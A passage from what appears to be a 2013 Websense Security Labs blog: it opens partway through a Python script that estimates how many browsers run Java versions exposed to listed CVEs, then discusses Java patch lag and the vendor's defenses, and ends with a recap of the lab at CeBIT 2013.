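    ("CVE-2012-1723", 4, 32),
    ("CVE-2012-0507", 2, 30),
]

# Accepts the java.version form "1.7.0_17" and the shorthand "1.7.17" used in the table.
VERSION_RE = re.compile(r"^1\.(?P<family>[4-8])\.(?:0_)?(?P<update>\d+)$")
# Assumed User-Agent format: the Java plugin advertises itself with a "Java/1.x.0_NN" token.
UA_JAVA_RE = re.compile(r"\bJava/(1\.\d\.\d+(?:_\d+)?)")


def parse_jre_version(text):
    """Return (family, update): '1.7.0_17' -> (7, 17), '1.6.41' -> (6, 41)."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised JRE version: {text!r}")
    return int(m.group("family")), int(m.group("update"))


def vulnerable_cves(version):
    """List the CVEs from the table that a given JRE version is exposed to."""
    family, update = parse_jre_version(version)
    hits = []
    for cve, last_vuln_7, last_vuln_6 in VULN_TABLE:
        if family >= 8:              # no JRE 8 rows in the table, so nothing to say
            continue
        if family == 7:
            exposed = update <= last_vuln_7
        elif family == 6:
            exposed = update <= last_vuln_6
        else:
            exposed = True           # JRE 5 and older: "all prior JRE versions ... are also vulnerable"
        if exposed:
            hits.append(cve)
    return hits


def jre_from_user_agent(user_agent):
    """Extract the JRE version a Java plugin request advertises, or None for non-Java requests."""
    m = UA_JAVA_RE.search(user_agent)
    return m.group(1) if m else None


def vulnerable_share(user_agents):
    """Fraction of Java requests exposed to each CVE, the way the percentages in the table are read."""
    versions = [v for v in map(jre_from_user_agent, user_agents) if v]
    if not versions:
        return {}
    exposed = Counter()
    for version in versions:
        exposed.update(vulnerable_cves(version))
    return {cve: exposed[cve] / len(versions) for cve, _, _ in VULN_TABLE}


# Constructed sample of plugin requests (not real telemetry): one patched client, two laggards, one non-Java.
SAMPLE_USER_AGENTS = [
    "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_21",
    "Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_31",
    "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_09",
    "Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0",
]

if __name__ == "__main__":
    for cve, share in vulnerable_share(SAMPLE_USER_AGENTS).items():
        print(f"{cve}: {share:.0%} of Java requests exposed")
```

Run against real proxy logs, the same function gives you the one number that matters for prioritising the Java rollout: the share of your own browsers that the kits named in the right-hand column can already exploit.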


It is probably no surprise that the single most widely exploitable vulnerability is the most recent one, with 93.77% of browsers vulnerable. That is what the bad guys do: examine your security controls and find the easiest way past them. Grabbing the latest version of Cool and using a pre-packaged exploit is a pretty low bar for going after such a large population of vulnerable browsers. Most browsers are vulnerable to a much broader array of well-known Java holes: over 75% run versions at least six months old, nearly two-thirds are more than a year out of date, and more than 50% are over two years behind on Java vulnerabilities. And don't forget that if you are not on version 7 (78.86% of you), Oracle will not be sending you any more updates even as new vulnerabilities are uncovered.


How do you stop the onslaught if the patches aren't keeping up? Given the complexity and churn of exploit kits and their updates, exploit signatures alone do not suffice. Our protection model against new Java exploits uses analytics and real-time telemetry to intercept new instances proactively at every step of the attack. Most prominently, ACE covers the exploit kit/exploit phase with fine-grained knowledge of the threats the major kits can express: not just the vulnerabilities, but also their obfuscation techniques, redirection techniques and re-packaging of dropper files. Here are a few other ways we interrupt the malware kill chain to make it harder for the bad guys to drive through this sizable hole in current IT infrastructure:


  • Real-time intelligence to block lures, phishing, and other forms of social engineering coming across web, email, and mobile platforms
  • Real-time inbound intelligence to identify known or suspicious malware destinations and compromised sites 
  • Real-time outbound intelligence to identify command and control communication, bot networks, dynamic DNS requests, and fingerprinted data headed to the wrong people or places
  • Identifying malicious droppers both statically and behaviorally (via Websense ThreatScope™)


It's clearly not just the zero-day attacks that should be getting all of the attention.

Websense Security Labs at CeBIT 2013
Posted: 15 Mar 2013 07:08 AM

We returned from CeBIT, one of the largest and most influential technology conferences in the world, last week.


The lead theme at this year's conference was that of "Shareconomy", finding benefit in exchanging ideas and information.  As a security lab, we embrace the idea of the Shareconomy and have a tremendous amount of threat intelligence to contribute. 


Websense Security Labs was an active participant in the show throughout the week. In case you missed it, here is how we got involved:


Speakers Corner

We delivered a presentation introducing results from a recent independent security test which highlighted security effectiveness across the kill chain.  You can download the test report from our website.  The "7 Stages of Advanced Threats" are explained here.  


SpeakUp Live

Our usual interactive discussion session format went on the road at CeBIT as we opened up the topic of securing mobile devices in the workplace.

Audience participation (via a remote voting system) drove the conversation into areas of:

  • How do I secure my data on employee-owned smartphones?
  • Do I feel protected from the risks brought about by Bring Your Own Device (BYOD)?
  • What do I perceive to be the biggest risks in regards to BYOD?

The majority of attendees at our CeBIT discussion (65%) felt that they were not adequately protected from the many risks associated with BYOD. Specifically, 46% of attendees were equally concerned about malicious mobile applications, lost devices, and securing their private data against theft.


We look forward to seeing you and collaborating at future security conferences around the globe.


Carl Leonard


©2013 Websense, Inc. All Rights Reserved.